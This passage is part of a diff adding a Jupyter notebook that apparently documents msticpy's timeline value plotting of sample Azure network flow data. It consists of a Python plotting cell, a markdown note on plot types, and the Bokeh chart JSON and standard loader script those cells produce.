\"},\"toolbar\":{\"id\":\"3633\"},\"toolbar_location\":\"above\",\"width\":900,\"x_range\":{\"id\":\"3611\"},\"x_scale\":{\"id\":\"3615\"},\"y_range\":{\"id\":\"3613\"},\"y_scale\":{\"id\":\"3617\"}},\"id\":\"3608\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"3645\",\"type\":\"VBar\"},{\"attributes\":{\"source\":{\"id\":\"3733\"}},\"id\":\"3738\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"3908\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"overlay\":{\"id\":\"3632\"}},\"id\":\"3628\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"3615\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"3789\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"source\":{\"id\":\"3803\"}},\"id\":\"3808\",\"type\":\"CDSView\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"3661\",\"type\":\"DaysTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"3659\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"3660\",\"type\":\"DaysTicker\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"3658\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"3662\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"3887\",\"type\":\"DataRange1d\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"3664\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"label\":{\"value\":\"ssh\"},\"renderers\":[{\"id\":\"3845\"}]},\"id\":\"3880\",\"type\":\"LegendItem\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"3663\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"3950\",\"type\":\"Selection\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"3665\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"3908\"},\"x_range\":{\"id\":\"3611\"},\"y_range\":null},\"id\":\"3907\",\"type\":\"RangeTool\"},{\"attributes\":{\"source\":{\"id\":\"3841\"}},\"id\":\"3846\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"3920\",\"type\":\"AllLabels\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"3666\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"3841\"},\"glyph\":{\"id\":\"3843\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3844\"},\"view\":{\"id\":\"3846\"}},\"id\":\"3845\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"3667\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"3951\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"3957\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"3843\",\"type\":\"VBar\"},{\"attributes\":{},\"id\":\"3668\",\"type\":\"YearsTicker\"},{\"attributes\":{\"items\":[{\"id\":\"3670\"},{\"id\":\"3700\"},{\"id\":\"3732\"},{\"id\":\"3766\"},{\"id\":\"3802\"},{\"id\":\"3840\"},{\"id\":\"3880\"}]},\"id\":\"3669\",\"type\":\"Legend\"},{\"attributes\":{},\"id\":\"3826\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"3827\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"3963\",\"type\":\"YearsTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"3803\"},\"glyph\":{\"id\":\"3805\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3806\"},\"view\":{\"id\":\"3808\"}},\"id\":\"3807\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"label\":{\"value\":\"ms-wbt-server\"},\"renderers\":[{\"id\":\"3771\"}]},\"id\":\"3802\",\"type\":\"LegendItem\"},{\"attributes\":{\"label\":{\"value\":\"ftp\"},\"renderers\":[{\"id\":\"3646\"}]},\"id\":\"3670\",\"type\":\"LegendItem\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"3883\",\"type\":\"Title\"},{\"attributes\":{\"label\":{\"value\":\"microsoft-ds\"},\"renderers\":[{\"id\":\"3737\"}]},\"id\":\"3766\",\"type\":\"LegendItem\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"3704\",\"type\":\"VBar\"},{\"attributes\":{\"end\":1550172982249.9998,\"start\":1549950766750.0002},\"id\":\"3885\",\"type\":\"Range1d\"},{\"attributes\":{\"source\":{\"id\":\"3671\"}},\"id\":\"3676\",\"type\":\"CDSView\"},{\"attributes\":{\"below\":[{\"id\":\"3893\"},{\"id\":\"3898\"}],\"center\":[{\"id\":\"3896\"}],\"height\":120,\"renderers\":[{\"id\":\"3905\"}],\"title\":{\"id\":\"3883\"},\"toolbar\":{\"id\":\"3897\"},\"toolbar_location\":null,\"width\":900,\"x_range\":{\"id\":\"3885\"},\"x_scale\":{\"id\":\"3889\"},\"y_range\":{\"id\":\"3887\"},\"y_scale\":{\"id\":\"3891\"}},\"id\":\"3882\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"3674\",\"type\":\"VBar\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":\"10px\"},\"id\":\"3898\",\"type\":\"Title\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"3703\",\"type\":\"VBar\"},{\"attributes\":{},\"id\":\"3687\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"131.107.147.209\",\"131.107.147.209\",\"131.107.147.209\",\"131.107.147.209\"],\"FlowDirection\":[\"I\",\"I\",\"I\",\"I\"],\"FlowStartTime\":{\"__ndarray__\":\"AICzNCqOdkIAgAn3Ko52QgCA+n40jnZCAAD/1TWOdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[4]},\"FlowType\":[\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\"],\"L7Protocol\":[\"ms-wbt-server\",\"ms-wbt-server\",\"ms-wbt-server\",\"ms-wbt-server\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAAAEAAAAAAAAAmQAAAAAAAAAhAAAAAAAAAAEA=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[4]},\"color\":[\"#1EA087\",\"#1EA087\",\"#1EA087\",\"#1EA087\"],\"index\":[413,414,415,416],\"y_index\":[4,4,4,4]},\"selected\":{\"id\":\"3788\"},\"selection_policy\":{\"id\":\"3789\"}},\"id\":\"3767\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"data_source\":{\"id\":\"3671\"},\"glyph\":{\"id\":\"3673\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3674\"},\"view\":{\"id\":\"3676\"}},\"id\":\"3675\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"3867\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"3844\",\"type\":\"VBar\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"3962\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"3686\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"3866\",\"type\":\"Selection\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"10.0.3.4\",\"10.0.3.5\",\"10.0.3.4\",\"10.0.3.5\"],\"FlowDirection\":[\"I\",\"O\",\"I\",\"O\"],\"FlowStartTime\":{\"__ndarray__\":\"AIAn7CuOdkIAgCfsK452QgAAG5tFjnZCAAAbm0WOdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[4]},\"FlowType\":[\"IntraVNet\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\"],\"L7Protocol\":[\"microsoft-ds\",\"microsoft-ds\",\"microsoft-ds\",\"microsoft-ds\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAAGEAAAAAAAAAYQAAAAAAAAAhAAAAAAAAACEA=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[4]},\"color\":[\"#277E8E\",\"#277E8E\",\"#277E8E\",\"#277E8E\"],\"index\":[417,418,419,420],\"y_index\":[3,3,3,3]},\"selected\":{\"id\":\"3752\"},\"selection_policy\":{\"id\":\"3753\"}},\"id\":\"3733\",\"type\":\"ColumnDataSource\"}],\"root_ids\":[\"3912\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"3416e19e-90a1-4fa9-8006-26b4765840b5\",\"root_ids\":[\"3912\"],\"roots\":{\"3912\":\"ba32b7cb-1e10-47bc-892d-888d8f4e515f\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "3912"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from msticpy.nbtools.timeline import display_timeline_values\r\n",
+    "\r\n",
+    "az_net_flows_df = pd.read_csv(\r\n",
+    "    \"data/az_net_flows.csv\",\r\n",
+    "    parse_dates=[\"TimeGenerated\", \"FlowStartTime\", \"FlowEndTime\"],\r\n",
+    "    infer_datetime_format=True,\r\n",
+    "    index_col=0,\r\n",
+    ")\r\n",
+    "\r\n",
+    "az_net_flows_df.mp_timeline.plot_values(\r\n",
+    "    group_by=\"L7Protocol\",\r\n",
+    "    source_columns=[\r\n",
+    "        \"FlowType\",\r\n",
+    "        \"AllExtIPs\",\r\n",
+    "        \"L7Protocol\",\r\n",
+    "        \"FlowDirection\",\r\n",
+    "        \"TotalAllowedFlows\",\r\n",
+    "    ],\r\n",
+    "    time_column=\"FlowStartTime\",\r\n",
+    "    value_col=\"TotalAllowedFlows\",\r\n",
+    "    legend=\"right\",\r\n",
+    "    height=500,\r\n",
+    ");"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "By default the plot uses vertical bars show the values but you can use any combination of vbar, circle and line, using the `kind` parameter. You specify the plot types as a list of strings (all lowercase).\n",
+    "\n",
+    "**Notes**\n",
+    "- including \"circle\" in the plot kinds makes it easier to see the hover value\n",
+    "- the line plot can be a bit misleading since it will plot lines between adjacent data points of the same series implying that there is a gradual change in the value being plotted - even though there may be no data between the times of these adjacent points. For this reason using vbar is often a more accurate view."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 11,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-01-30T20:46:29.964338Z",
+     "start_time": "2020-01-30T20:46:29.722475Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"4219\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"4219\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"4219\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"97c9f024-7c07-4b81-9ded-d8f1e6629bef\" data-root-id=\"4749\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"24b2cd20-c99f-436b-8e32-edd737404607\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"4221\"},{\"id\":\"4719\"}]},\"id\":\"4749\",\"type\":\"Column\"},{\"attributes\":{\"data_source\":{\"id\":\"4255\"},\"glyph\":{\"id\":\"4257\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4258\"},\"view\":{\"id\":\"4260\"}},\"id\":\"4259\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"4792\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"4465\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"4517\",\"type\":\"Selection\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"4793\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"4385\",\"type\":\"Selection\"},{\"attributes\":{\"label\":{\"value\":\"https\"},\"renderers\":[{\"id\":\"4372\"},{\"id\":\"4403\"}]},\"id\":\"4399\",\"type\":\"LegendItem\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"4799\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"4341\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"4795\",\"type\":\"DaysTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"4430\"},\"glyph\":{\"id\":\"4465\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4466\"},\"view\":{\"id\":\"4468\"}},\"id\":\"4467\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"source\":{\"id\":\"4566\"}},\"id\":\"4571\",\"type\":\"CDSView\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"4794\",\"type\":\"DaysTicker\"},{\"attributes\":{\"source\":{\"id\":\"4496\"}},\"id\":\"4536\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"4568\",\"type\":\"VBar\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"4798\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"4496\"},\"glyph\":{\"id\":\"4533\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4534\"},\"view\":{\"id\":\"4536\"}},\"id\":\"4535\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"4797\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"4736\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{},\"id\":\"4590\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"4274\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"4665\",\"type\":\"Selection\"},{\"attributes\":{\"data_source\":{\"id\":\"4738\"},\"glyph\":{\"id\":\"4740\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4741\"},\"view\":{\"id\":\"4743\"}},\"id\":\"4742\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"label\":{\"value\":\"microsoft-ds\"},\"renderers\":[{\"id\":\"4434\"},{\"id\":\"4467\"}]},\"id\":\"4463\",\"type\":\"LegendItem\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"4313\",\"type\":\"VBar\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"4682\",\"type\":\"Circle\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"4642\",\"type\":\"VBar\"},{\"attributes\":{\"data_source\":{\"id\":\"4640\"},\"glyph\":{\"id\":\"4642\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4643\"},\"view\":{\"id\":\"4645\"}},\"id\":\"4644\",\"type\":\"Glyp